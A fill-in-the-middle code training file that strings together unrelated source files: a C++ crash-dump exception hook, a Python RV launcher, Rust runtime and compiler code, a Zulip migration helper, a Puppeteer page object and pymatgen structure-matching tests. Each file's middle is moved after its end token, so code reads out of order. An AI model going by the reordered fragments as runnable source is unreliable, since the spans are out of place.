//HOOKµ±Ç°¶þ¸öº¯Êý
if (!Mhook_SetHook((PVOID*)&Real_UnhandledExceptionFilter, DeBug_UnHandleCreateDump))
{
return FALSE;
}
return TRUE;
}
void HandleException::EnableDumpFile( BOOL bMakeDump /*= TRUE*/ )
{
bMakeDumpFile = bMakeDump;
}
void HandleException::SetExceptionCallback( PFN_HandleException fn ,LONG lExceptHandleCode )
{
lExceptCode = lExceptHandleCode;
fnSEHException = fn;
gEventExit = CreateEvent(NULL,FALSE,FALSE,NULL);
StartHookDebug();
//defaultExceptionCallBack = SetUnhandledExceptionFilter(&DeBug_CreateDump);
}<|fim▁end|> | |
<|file_name|>rv.py<|end_file_name|><|fim▁begin|>import os
from subprocess import call, Popen, PIPE<|fim▁hole|>from . import Command
from . import utils
class OpenSequenceInRV(Command):
"""%prog [options] [paths]
Open the latest version for each given entity.
"""
def run(self, sgfs, opts, args):
# Parse them all.
arg_to_movie = {}
arg_to_entity = {}
for arg in args:
if os.path.exists(arg):
arg_to_movie[arg] = arg
continue
print 'Parsing %r...' % arg
data = utils.parse_spec(sgfs, arg.split(), ['Shot'])
type_ = data.get('type')
id_ = data.get('id')
if not (type_ or id_):
print 'no entities found for', repr(arg)
return 1
arg_to_entity.setdefault(type_, {})[arg] = sgfs.session.merge(dict(type=type_, id=id_))
tasks = arg_to_entity.pop('Task', {})
shots = arg_to_entity.pop('Shot', {})
if arg_to_entity:
print 'found entities that were not Task or Shot:', ', '.join(sorted(arg_to_entity))
return 2
if tasks:
print 'Getting shots from tasks...'
sgfs.session.fetch(tasks.values(), 'entity')
for arg, task in tasks.iteritems():
shots[arg] = task['entity']
if shots:
print 'Getting versions from shots...'
sgfs.session.fetch(shots.values(), ('sg_latest_version.Version.sg_path_to_movie', 'sg_latest_version.Version.sg_path_to_frames'))
for arg, shot in shots.iteritems():
version = shot.get('sg_latest_version')
if not version:
print 'no version for', shot
return 3
path = version.get('sg_path_to_movie') or version.get('sg_path_to_frames')
if not path:
print 'no movie or frames for', version
return 4
arg_to_movie[arg] = path
movies = [arg_to_movie[arg] for arg in args]
print 'Opening:'
print '\t' + '\n\t'.join(movies)
rvlink = Popen(['rv', '-bakeURL'] + movies, stderr=PIPE).communicate()[1].strip().split()[-1]
self.open(rvlink)
def open(self, x):
if sys.platform.startswith('darwin'):
call(['open', x])
else:
call(['xdg-open', x])
run = OpenSequenceInRV()<|fim▁end|> | import sys
|
<|file_name|>at_exit_imp.rs<|end_file_name|><|fim▁begin|>// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Implementation of running at_exit routines
//!
//! Documentation can be found on the `rt::at_exit` function.
use core::prelude::*;
use boxed::Box;
use vec::Vec;
use mem;
use thunk::Thunk;
use sys_common::mutex::{Mutex, MUTEX_INIT};
type Queue = Vec<Thunk<'static>>;
// NB these are specifically not types from `std::sync` as they currently rely
// on poisoning and this module needs to operate at a lower level than requiring
// the thread infrastructure to be in place (useful on the borders of
// initialization/destruction).
static LOCK: Mutex = MUTEX_INIT;
static mut QUEUE: *mut Queue = 0 as *mut Queue;
unsafe fn init() {
if QUEUE.is_null() {
let state: Box<Queue> = box Vec::new();
QUEUE = mem::transmute(state);
} else {
// can't re-init after a cleanup
rtassert!(QUEUE as uint != 1);<|fim▁hole|> // instead the cleanup is tied to the `std::rt` entry point.
//
// ::libc::atexit(cleanup);
}
pub fn cleanup() {
unsafe {
LOCK.lock();
let queue = QUEUE;
QUEUE = 1 as *mut _;
LOCK.unlock();
// make sure we're not recursively cleaning up
rtassert!(queue as uint != 1);
// If we never called init, not need to cleanup!
if queue as uint != 0 {
let queue: Box<Queue> = mem::transmute(queue);
for to_run in *queue {
to_run.invoke(());
}
}
}
}
pub fn push(f: Thunk<'static>) {
unsafe {
LOCK.lock();
init();
(*QUEUE).push(f);
LOCK.unlock();
}
}<|fim▁end|> | }
// FIXME: switch this to use atexit as below. Currently this
// segfaults (the queue's memory is mysteriously gone), so |
<|file_name|>fix_unreads.py<|end_file_name|><|fim▁begin|>import time
import logging
from typing import Callable, List, TypeVar, Text
from psycopg2.extensions import cursor
CursorObj = TypeVar('CursorObj', bound=cursor)
from django.db import connection
from zerver.models import UserProfile
'''
NOTE! Be careful modifying this library, as it is used
in a migration, and it needs to be valid for the state
of the database that is in place when the 0104_fix_unreads
migration runs.
'''<|fim▁hole|>logger = logging.getLogger('zulip.fix_unreads')
logger.setLevel(logging.WARNING)
def build_topic_mute_checker(cursor, user_profile):
# type: (CursorObj, UserProfile) -> Callable[[int, Text], bool]
'''
This function is similar to the function of the same name
in zerver/lib/topic_mutes.py, but it works without the ORM,
so that we can use it in migrations.
'''
query = '''
SELECT
recipient_id,
topic_name
FROM
zerver_mutedtopic
WHERE
user_profile_id = %s
'''
cursor.execute(query, [user_profile.id])
rows = cursor.fetchall()
tups = {
(recipient_id, topic_name.lower())
for (recipient_id, topic_name) in rows
}
def is_muted(recipient_id, topic):
# type: (int, Text) -> bool
return (recipient_id, topic.lower()) in tups
return is_muted
def update_unread_flags(cursor, user_message_ids):
# type: (CursorObj, List[int]) -> None
um_id_list = ', '.join(str(id) for id in user_message_ids)
query = '''
UPDATE zerver_usermessage
SET flags = flags | 1
WHERE id IN (%s)
''' % (um_id_list,)
cursor.execute(query)
def get_timing(message, f):
# type: (str, Callable) -> None
start = time.time()
logger.info(message)
f()
elapsed = time.time() - start
logger.info('elapsed time: %.03f\n' % (elapsed,))
def fix_unsubscribed(cursor, user_profile):
# type: (CursorObj, UserProfile) -> None
recipient_ids = []
def find_recipients():
# type: () -> None
query = '''
SELECT
zerver_subscription.recipient_id
FROM
zerver_subscription
INNER JOIN zerver_recipient ON (
zerver_recipient.id = zerver_subscription.recipient_id
)
WHERE (
zerver_subscription.user_profile_id = '%s' AND
zerver_recipient.type = 2 AND
(NOT zerver_subscription.active)
)
'''
cursor.execute(query, [user_profile.id])
rows = cursor.fetchall()
for row in rows:
recipient_ids.append(row[0])
logger.info(str(recipient_ids))
get_timing(
'get recipients',
find_recipients
)
if not recipient_ids:
return
user_message_ids = []
def find():
# type: () -> None
recips = ', '.join(str(id) for id in recipient_ids)
query = '''
SELECT
zerver_usermessage.id
FROM
zerver_usermessage
INNER JOIN zerver_message ON (
zerver_message.id = zerver_usermessage.message_id
)
WHERE (
zerver_usermessage.user_profile_id = %s AND
(zerver_usermessage.flags & 1) = 0 AND
zerver_message.recipient_id in (%s)
)
''' % (user_profile.id, recips)
logger.info('''
EXPLAIN analyze''' + query.rstrip() + ';')
cursor.execute(query)
rows = cursor.fetchall()
for row in rows:
user_message_ids.append(row[0])
logger.info('rows found: %d' % (len(user_message_ids),))
get_timing(
'finding unread messages for non-active streams',
find
)
if not user_message_ids:
return
def fix():
# type: () -> None
update_unread_flags(cursor, user_message_ids)
get_timing(
'fixing unread messages for non-active streams',
fix
)
def fix_pre_pointer(cursor, user_profile):
# type: (CursorObj, UserProfile) -> None
pointer = user_profile.pointer
if not pointer:
return
recipient_ids = []
def find_non_muted_recipients():
# type: () -> None
query = '''
SELECT
zerver_subscription.recipient_id
FROM
zerver_subscription
INNER JOIN zerver_recipient ON (
zerver_recipient.id = zerver_subscription.recipient_id
)
WHERE (
zerver_subscription.user_profile_id = '%s' AND
zerver_recipient.type = 2 AND
zerver_subscription.in_home_view AND
zerver_subscription.active
)
'''
cursor.execute(query, [user_profile.id])
rows = cursor.fetchall()
for row in rows:
recipient_ids.append(row[0])
logger.info(str(recipient_ids))
get_timing(
'find_non_muted_recipients',
find_non_muted_recipients
)
if not recipient_ids:
return
user_message_ids = []
def find_old_ids():
# type: () -> None
recips = ', '.join(str(id) for id in recipient_ids)
is_topic_muted = build_topic_mute_checker(cursor, user_profile)
query = '''
SELECT
zerver_usermessage.id,
zerver_message.recipient_id,
zerver_message.subject
FROM
zerver_usermessage
INNER JOIN zerver_message ON (
zerver_message.id = zerver_usermessage.message_id
)
WHERE (
zerver_usermessage.user_profile_id = %s AND
zerver_usermessage.message_id <= %s AND
(zerver_usermessage.flags & 1) = 0 AND
zerver_message.recipient_id in (%s)
)
''' % (user_profile.id, pointer, recips)
logger.info('''
EXPLAIN analyze''' + query.rstrip() + ';')
cursor.execute(query)
rows = cursor.fetchall()
for (um_id, recipient_id, topic) in rows:
if not is_topic_muted(recipient_id, topic):
user_message_ids.append(um_id)
logger.info('rows found: %d' % (len(user_message_ids),))
get_timing(
'finding pre-pointer messages that are not muted',
find_old_ids
)
if not user_message_ids:
return
def fix():
# type: () -> None
update_unread_flags(cursor, user_message_ids)
get_timing(
'fixing unread messages for pre-pointer non-muted messages',
fix
)
def fix(user_profile):
# type: (UserProfile) -> None
logger.info('\n---\nFixing %s:' % (user_profile.email,))
with connection.cursor() as cursor:
fix_unsubscribed(cursor, user_profile)
fix_pre_pointer(cursor, user_profile)<|fim▁end|> | |
<|file_name|>urls.py<|end_file_name|><|fim▁begin|>from django.conf.urls import url
from . import views<|fim▁hole|><|fim▁end|> |
urlpatterns = [
url(r'^$', views.AP_list, name='AP_list'),
] |
<|file_name|>profile-page.ts<|end_file_name|><|fim▁begin|>import { Page } from 'puppeteer';
import Textbox from 'app/element/textbox';
import AuthenticatedPage from 'app/page/authenticated-page';
import { waitForDocumentTitle, waitForUrl, waitWhileLoading } from 'utils/waits-utils';
import Button from 'app/element/button';
import Textarea from 'app/element/textarea';
import { PageUrl } from 'app/text-labels';
import Link from 'app/element/link';
export const PageTitle = 'Profile';
const LabelAlias = {
ResearchBackground: 'Your research background, experience and research interests',
SaveProfile: 'Save Profile',
NeedsConfirmation: 'Please update or verify your profile.',
LooksGood: 'Looks Good'
};
const DataTestIdAlias = {
FirstName: 'givenName',
LastName: 'familyName',
ProfessionalUrl: 'professionalUrl',<|fim▁hole|> State: 'state',
Zip: 'zipCode',
Country: 'country'
};
export const MissingErrorAlias = {
FirstName: 'First Name',
LastName: 'Last Name',
ResearchBackground: 'Current Research',
Address1: 'Street address1',
City: 'City',
State: 'State',
Zip: 'Zip code',
Country: 'Country'
};
export default class ProfilePage extends AuthenticatedPage {
constructor(page: Page) {
super(page);
}
/**
* Load 'Profile' page and ensure page load is completed.
*/
async load(): Promise<this> {
await this.loadPage({ url: PageUrl.Profile });
await waitWhileLoading(this.page);
return this;
}
async isLoaded(): Promise<boolean> {
await Promise.all([waitForUrl(this.page, '/profile'), waitForDocumentTitle(this.page, PageTitle)]);
await waitWhileLoading(this.page);
return true;
}
getFirstNameInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.FirstName });
}
getLastNameInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.LastName });
}
getProfessionalUrlInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.ProfessionalUrl });
}
getResearchBackgroundTextarea(): Textarea {
return Textarea.findByName(this.page, { normalizeSpace: LabelAlias.ResearchBackground });
}
getAddress1Input(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.Address1 });
}
getAddress2Input(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.Address2 });
}
getCityInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.City });
}
getStateInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.State });
}
getZipCodeInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.Zip });
}
getCountryInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.Country });
}
getSaveProfileButton(): Button {
return Button.findByName(this.page, { name: LabelAlias.SaveProfile });
}
async needsConfirmation(): Promise<boolean> {
return await this.containsText(LabelAlias.NeedsConfirmation);
}
getLooksGoodLink(): Link {
return Link.findByName(this.page, { name: LabelAlias.LooksGood });
}
}<|fim▁end|> | Address1: 'streetAddress1',
Address2: 'streetAddress2',
City: 'city', |
<|file_name|>loopapp.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# coding: utf-8
from .interactiveapp import InteractiveApplication, ENCODING
class InteractiveLoopApplication(InteractiveApplication):<|fim▁hole|>
super(InteractiveLoopApplication, self).__init__(
name, desc, version, padding, margin, suffix, encoding)
# loop status
self.STATUS_EXIT = 0
self.STATUS_CONTINUE = 1
def loop(self, func):
def mainloop():
loop_flag = self.STATUS_CONTINUE
while loop_flag == self.STATUS_CONTINUE:
try:
loop_flag = func()
except KeyboardInterrupt:
self.write_error("Terminated.")
self.exit(0)
self.exit(0)
return mainloop<|fim▁end|> |
def __init__(self, name, desc, version,
padding, margin, suffix, encoding=ENCODING): |
<|file_name|>progpoint.rs<|end_file_name|><|fim▁begin|>//! Program points.
use entity::EntityRef;
use ir::{Ebb, Inst, ValueDef};
use std::fmt;
use std::u32;
use std::cmp;
/// A `ProgramPoint` represents a position in a function where the live range of an SSA value can
/// begin or end. It can be either:
///
/// 1. An instruction or
/// 2. An EBB header.
///
/// This corresponds more or less to the lines in the textual representation of Cretonne IL.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct ProgramPoint(u32);
impl From<Inst> for ProgramPoint {
fn from(inst: Inst) -> ProgramPoint {
let idx = inst.index();
debug_assert!(idx < (u32::MAX / 2) as usize);
ProgramPoint((idx * 2) as u32)
}
}
impl From<Ebb> for ProgramPoint {
fn from(ebb: Ebb) -> ProgramPoint {
let idx = ebb.index();
debug_assert!(idx < (u32::MAX / 2) as usize);
ProgramPoint((idx * 2 + 1) as u32)
}
}
impl From<ValueDef> for ProgramPoint {
fn from(def: ValueDef) -> ProgramPoint {
match def {
ValueDef::Result(inst, _) => inst.into(),
ValueDef::Param(ebb, _) => ebb.into(),
}
}
}
/// An expanded program point directly exposes the variants, but takes twice the space to
/// represent.
#[derive(PartialEq, Eq, Clone, Copy)]
pub enum ExpandedProgramPoint {
/// An instruction in the function.
Inst(Inst),
/// An EBB header.
Ebb(Ebb),
}
impl ExpandedProgramPoint {
/// Get the instruction we know is inside.
pub fn unwrap_inst(self) -> Inst {
match self {
ExpandedProgramPoint::Inst(x) => x,
ExpandedProgramPoint::Ebb(x) => panic!("expected inst: {}", x),
}
}
}
impl From<Inst> for ExpandedProgramPoint {
fn from(inst: Inst) -> ExpandedProgramPoint {
ExpandedProgramPoint::Inst(inst)
}
}
impl From<Ebb> for ExpandedProgramPoint {
fn from(ebb: Ebb) -> ExpandedProgramPoint {
ExpandedProgramPoint::Ebb(ebb)
}
}
impl From<ValueDef> for ExpandedProgramPoint {
fn from(def: ValueDef) -> ExpandedProgramPoint {
match def {
ValueDef::Result(inst, _) => inst.into(),
ValueDef::Param(ebb, _) => ebb.into(),
}
}
}
impl From<ProgramPoint> for ExpandedProgramPoint {
fn from(pp: ProgramPoint) -> ExpandedProgramPoint {
if pp.0 & 1 == 0 {
ExpandedProgramPoint::Inst(Inst::new((pp.0 / 2) as usize))
} else {
ExpandedProgramPoint::Ebb(Ebb::new((pp.0 / 2) as usize))
}
}
}
impl fmt::Display for ExpandedProgramPoint {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match *self {
ExpandedProgramPoint::Inst(x) => write!(f, "{}", x),
ExpandedProgramPoint::Ebb(x) => write!(f, "{}", x),
}
}
}
impl fmt::Display for ProgramPoint {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
let epp: ExpandedProgramPoint = (*self).into();
epp.fmt(f)
}
}
impl fmt::Debug for ExpandedProgramPoint {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "ExpandedProgramPoint({})", self)
}
}
impl fmt::Debug for ProgramPoint {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "ProgramPoint({})", self)
}
}
/// Context for ordering program points.
///
/// `ProgramPoint` objects don't carry enough information to be ordered independently, they need a
/// context providing the program order.
pub trait ProgramOrder {
/// Compare the program points `a` and `b` relative to this program order.
///
/// Return `Less` if `a` appears in the program before `b`.
///
/// This is declared as a generic such that it can be called with `Inst` and `Ebb` arguments
/// directly. Depending on the implementation, there is a good chance performance will be
/// improved for those cases where the type of either argument is known statically.
fn cmp<A, B>(&self, a: A, b: B) -> cmp::Ordering
where
A: Into<ExpandedProgramPoint>,
B: Into<ExpandedProgramPoint>;
/// Is the range from `inst` to `ebb` just the gap between consecutive EBBs?
///
/// This returns true if `inst` is the terminator in the EBB immediately before `ebb`.
fn is_ebb_gap(&self, inst: Inst, ebb: Ebb) -> bool;
}
#[cfg(test)]
mod tests {
use super::*;
use entity::EntityRef;
use ir::{Inst, Ebb};
use std::string::ToString;
#[test]
fn convert() {
let i5 = Inst::new(5);
let b3 = Ebb::new(3);
let pp1: ProgramPoint = i5.into();
let pp2: ProgramPoint = b3.into();
assert_eq!(pp1.to_string(), "inst5");
assert_eq!(pp2.to_string(), "ebb3");<|fim▁hole|>}<|fim▁end|> | } |
<|file_name|>test_structure_matcher.py<|end_file_name|><|fim▁begin|># coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import itertools
import json
import os
import unittest
import numpy as np
from monty.json import MontyDecoder
from pymatgen.core.periodic_table import Element
from pymatgen.core.lattice import Lattice
from pymatgen.core.structure import Structure
from pymatgen.analysis.defects.core import Interstitial, Substitution, Vacancy
from pymatgen.analysis.structure_matcher import (
ElementComparator,
FrameworkComparator,
OccupancyComparator,
OrderDisorderElementComparator,
PointDefectComparator,
StructureMatcher,
)
from pymatgen.core import PeriodicSite
from pymatgen.core.operations import SymmOp
from pymatgen.util.coord import find_in_coord_list_pbc
from pymatgen.util.testing import PymatgenTest
class StructureMatcherTest(PymatgenTest):
_multiprocess_shared_ = True
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "TiO2_entries.json"), "r") as fp:
entries = json.load(fp, cls=MontyDecoder)
self.struct_list = [e.structure for e in entries]
self.oxi_structs = [
self.get_structure("Li2O"),
Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR.Li2O")),
]
def test_ignore_species(self):
s1 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "LiFePO4.cif"))
s2 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
m = StructureMatcher(ignored_species=["Li"], primitive_cell=False, attempt_supercell=True)
self.assertTrue(m.fit(s1, s2))
self.assertTrue(m.fit_anonymous(s1, s2))
groups = m.group_structures([s1, s2])
self.assertEqual(len(groups), 1)
s2.make_supercell((2, 1, 1))
ss1 = m.get_s2_like_s1(s2, s1, include_ignored_species=True)
self.assertAlmostEqual(ss1.lattice.a, 20.820740000000001)
self.assertEqual(ss1.composition.reduced_formula, "LiFePO4")
self.assertEqual(
{k.symbol: v.symbol for k, v in m.get_best_electronegativity_anonymous_mapping(s1, s2).items()},
{"Fe": "Fe", "P": "P", "O": "O"},
)
def test_get_supercell_size(self):
l = Lattice.cubic(1)
l2 = Lattice.cubic(0.9)
s1 = Structure(l, ["Mg", "Cu", "Ag", "Cu", "Ag"], [[0] * 3] * 5)
s2 = Structure(l2, ["Cu", "Cu", "Ag"], [[0] * 3] * 3)
sm = StructureMatcher(supercell_size="volume")
self.assertEqual(sm._get_supercell_size(s1, s2), (1, True))
self.assertEqual(sm._get_supercell_size(s2, s1), (1, True))
sm = StructureMatcher(supercell_size="num_sites")
self.assertEqual(sm._get_supercell_size(s1, s2), (2, False))
self.assertEqual(sm._get_supercell_size(s2, s1), (2, True))
sm = StructureMatcher(supercell_size="Ag")
self.assertEqual(sm._get_supercell_size(s1, s2), (2, False))
self.assertEqual(sm._get_supercell_size(s2, s1), (2, True))
sm = StructureMatcher(supercell_size=["Ag", "Cu"])
self.assertEqual(sm._get_supercell_size(s1, s2), (1, True))
self.assertEqual(sm._get_supercell_size(s2, s1), (1, True))
sm = StructureMatcher(supercell_size="wfieoh")
self.assertRaises(ValueError, sm._get_supercell_size, s1, s2)
def test_cmp_fstruct(self):
sm = StructureMatcher()
s1 = np.array([[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]])
s2 = np.array([[0.11, 0.22, 0.33]])
frac_tol = np.array([0.02, 0.03, 0.04])
mask = np.array([[False, False]])
mask2 = np.array([[True, False]])
self.assertRaises(ValueError, sm._cmp_fstruct, s2, s1, frac_tol, mask.T)
self.assertRaises(ValueError, sm._cmp_fstruct, s1, s2, frac_tol, mask.T)
self.assertTrue(sm._cmp_fstruct(s1, s2, frac_tol, mask))
self.assertFalse(sm._cmp_fstruct(s1, s2, frac_tol / 2, mask))
self.assertFalse(sm._cmp_fstruct(s1, s2, frac_tol, mask2))
def test_cart_dists(self):
sm = StructureMatcher()
l = Lattice.orthorhombic(1, 2, 3)
s1 = np.array([[0.13, 0.25, 0.37], [0.1, 0.2, 0.3]])
s2 = np.array([[0.11, 0.22, 0.33]])
s3 = np.array([[0.1, 0.2, 0.3], [0.11, 0.2, 0.3]])
s4 = np.array([[0.1, 0.2, 0.3], [0.1, 0.6, 0.7]])
mask = np.array([[False, False]])
mask2 = np.array([[False, True]])
mask3 = np.array([[False, False], [False, False]])
mask4 = np.array([[False, True], [False, True]])
n1 = (len(s1) / l.volume) ** (1 / 3)
n2 = (len(s2) / l.volume) ** (1 / 3)
self.assertRaises(ValueError, sm._cart_dists, s2, s1, l, mask.T, n2)
self.assertRaises(ValueError, sm._cart_dists, s1, s2, l, mask.T, n1)
d, ft, s = sm._cart_dists(s1, s2, l, mask, n1)
self.assertTrue(np.allclose(d, [0]))
self.assertTrue(np.allclose(ft, [-0.01, -0.02, -0.03]))
self.assertTrue(np.allclose(s, [1]))
# check that masking best value works
d, ft, s = sm._cart_dists(s1, s2, l, mask2, n1)
self.assertTrue(np.allclose(d, [0]))
self.assertTrue(np.allclose(ft, [0.02, 0.03, 0.04]))
self.assertTrue(np.allclose(s, [0]))
# check that averaging of translation is done properly
d, ft, s = sm._cart_dists(s1, s3, l, mask3, n1)
self.assertTrue(np.allclose(d, [0.08093341] * 2))
self.assertTrue(np.allclose(ft, [0.01, 0.025, 0.035]))
self.assertTrue(np.allclose(s, [1, 0]))
# check distances are large when mask allows no 'real' mapping
d, ft, s = sm._cart_dists(s1, s4, l, mask4, n1)
self.assertTrue(np.min(d) > 1e8)
self.assertTrue(np.min(ft) > 1e8)
def test_get_mask(self):
sm = StructureMatcher(comparator=ElementComparator())
l = Lattice.cubic(1)
s1 = Structure(l, ["Mg", "Cu", "Ag", "Cu"], [[0] * 3] * 4)
s2 = Structure(l, ["Cu", "Cu", "Ag"], [[0] * 3] * 3)
result = [
[True, False, True, False],
[True, False, True, False],
[True, True, False, True],
]
m, inds, i = sm._get_mask(s1, s2, 1, True)
self.assertTrue(np.all(m == result))
self.assertTrue(i == 2)
self.assertEqual(inds, [2])
# test supercell with match
result = [
[1, 1, 0, 0, 1, 1, 0, 0],
[1, 1, 0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 0, 0, 1, 1],
]
m, inds, i = sm._get_mask(s1, s2, 2, True)
self.assertTrue(np.all(m == result))
self.assertTrue(i == 2)
self.assertTrue(np.allclose(inds, np.array([4])))
# test supercell without match
result = [
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1],
]
m, inds, i = sm._get_mask(s2, s1, 2, True)
self.assertTrue(np.all(m == result))
self.assertTrue(i == 0)
self.assertTrue(np.allclose(inds, np.array([])))
# test s2_supercell
result = [
[1, 1, 1],
[1, 1, 1],
[0, 0, 1],
[0, 0, 1],
[1, 1, 0],
[1, 1, 0],
[0, 0, 1],
[0, 0, 1],
]
m, inds, i = sm._get_mask(s2, s1, 2, False)
self.assertTrue(np.all(m == result))
self.assertTrue(i == 0)
self.assertTrue(np.allclose(inds, np.array([])))
# test for multiple translation indices
s1 = Structure(l, ["Cu", "Ag", "Cu", "Ag", "Ag"], [[0] * 3] * 5)
s2 = Structure(l, ["Ag", "Cu", "Ag"], [[0] * 3] * 3)
result = [[1, 0, 1, 0, 0], [0, 1, 0, 1, 1], [1, 0, 1, 0, 0]]
m, inds, i = sm._get_mask(s1, s2, 1, True)
self.assertTrue(np.all(m == result))
self.assertTrue(i == 1)
self.assertTrue(np.allclose(inds, [0, 2]))
def test_get_supercells(self):
sm = StructureMatcher(comparator=ElementComparator())
l = Lattice.cubic(1)
l2 = Lattice.cubic(0.5)
s1 = Structure(l, ["Mg", "Cu", "Ag", "Cu"], [[0] * 3] * 4)
s2 = Structure(l2, ["Cu", "Cu", "Ag"], [[0] * 3] * 3)
scs = list(sm._get_supercells(s1, s2, 8, False))
for x in scs:
self.assertAlmostEqual(abs(np.linalg.det(x[3])), 8)
self.assertEqual(len(x[0]), 4)
self.assertEqual(len(x[1]), 24)
self.assertEqual(len(scs), 48)
scs = list(sm._get_supercells(s2, s1, 8, True))
for x in scs:
self.assertAlmostEqual(abs(np.linalg.det(x[3])), 8)
self.assertEqual(len(x[0]), 24)
self.assertEqual(len(x[1]), 4)
self.assertEqual(len(scs), 48)
def test_fit(self):
"""
Take two known matched structures
1) Ensure match
2) Ensure match after translation and rotations
3) Ensure no-match after large site translation
4) Ensure match after site shuffling
"""
sm = StructureMatcher()
self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))
# Test rotational/translational invariance
op = SymmOp.from_axis_angle_and_translation([0, 0, 1], 30, False, np.array([0.4, 0.7, 0.9]))
self.struct_list[1].apply_operation(op)
self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))
# Test failure under large atomic translation
self.struct_list[1].translate_sites([0], [0.4, 0.4, 0.2], frac_coords=True)
self.assertFalse(sm.fit(self.struct_list[0], self.struct_list[1]))
self.struct_list[1].translate_sites([0], [-0.4, -0.4, -0.2], frac_coords=True)
# random.shuffle(editor._sites)
self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))
# Test FrameworkComporator
sm2 = StructureMatcher(comparator=FrameworkComparator())
lfp = self.get_structure("LiFePO4")
nfp = self.get_structure("NaFePO4")
self.assertTrue(sm2.fit(lfp, nfp))
self.assertFalse(sm.fit(lfp, nfp))
# Test anonymous fit.
self.assertEqual(sm.fit_anonymous(lfp, nfp), True)
self.assertAlmostEqual(sm.get_rms_anonymous(lfp, nfp)[0], 0.060895871160262717)
# Test partial occupancies.
s1 = Structure(
Lattice.cubic(3),
[{"Fe": 0.5}, {"Fe": 0.5}, {"Fe": 0.5}, {"Fe": 0.5}],
[[0, 0, 0], [0.25, 0.25, 0.25], [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]],
)
s2 = Structure(
Lattice.cubic(3),
[{"Fe": 0.25}, {"Fe": 0.5}, {"Fe": 0.5}, {"Fe": 0.75}],
[[0, 0, 0], [0.25, 0.25, 0.25], [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]],
)
self.assertFalse(sm.fit(s1, s2))
self.assertFalse(sm.fit(s2, s1))
s2 = Structure(
Lattice.cubic(3),
[{"Mn": 0.5}, {"Mn": 0.5}, {"Mn": 0.5}, {"Mn": 0.5}],
[[0, 0, 0], [0.25, 0.25, 0.25], [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]],
)
self.assertEqual(sm.fit_anonymous(s1, s2), True)
self.assertAlmostEqual(sm.get_rms_anonymous(s1, s2)[0], 0)
# test symmetric
sm_coarse = sm = StructureMatcher(
comparator=ElementComparator(),
ltol=0.6,
stol=0.6,
angle_tol=6,
)
s1 = Structure.from_file(PymatgenTest.TEST_FILES_DIR / "fit_symm_s1.vasp")
s2 = Structure.from_file(PymatgenTest.TEST_FILES_DIR / "fit_symm_s2.vasp")
self.assertEqual(sm_coarse.fit(s1, s2), True)
self.assertEqual(sm_coarse.fit(s2, s1), False)
self.assertEqual(sm_coarse.fit(s1, s2, symmetric=True), False)
self.assertEqual(sm_coarse.fit(s2, s1, symmetric=True), False)
def test_oxi(self):
"""Test oxidation state removal matching"""
sm = StructureMatcher()
self.assertFalse(sm.fit(self.oxi_structs[0], self.oxi_structs[1]))
sm = StructureMatcher(comparator=ElementComparator())
self.assertTrue(sm.fit(self.oxi_structs[0], self.oxi_structs[1]))
def test_primitive(self):
"""Test primitive cell reduction"""
sm = StructureMatcher(primitive_cell=True)
self.struct_list[1].make_supercell([[2, 0, 0], [0, 3, 0], [0, 0, 1]])
self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))
def test_class(self):
# Tests entire class as single working unit
sm = StructureMatcher()
# Test group_structures and find_indices
out = sm.group_structures(self.struct_list)
self.assertEqual(list(map(len, out)), [4, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1])
self.assertEqual(sum(map(len, out)), len(self.struct_list))
for s in self.struct_list[::2]:
s.replace_species({"Ti": "Zr", "O": "Ti"})
out = sm.group_structures(self.struct_list, anonymous=True)
self.assertEqual(list(map(len, out)), [4, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1])
def test_mix(self):
structures = [
self.get_structure("Li2O"),
self.get_structure("Li2O2"),
self.get_structure("LiFePO4"),
]
for fname in ["POSCAR.Li2O", "POSCAR.LiFePO4"]:
structures.append(Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, fname)))
sm = StructureMatcher(comparator=ElementComparator())
groups = sm.group_structures(structures)
for g in groups:
formula = g[0].composition.reduced_formula
if formula in ["Li2O", "LiFePO4"]:
self.assertEqual(len(g), 2)
else:
self.assertEqual(len(g), 1)
def test_left_handed_lattice(self):
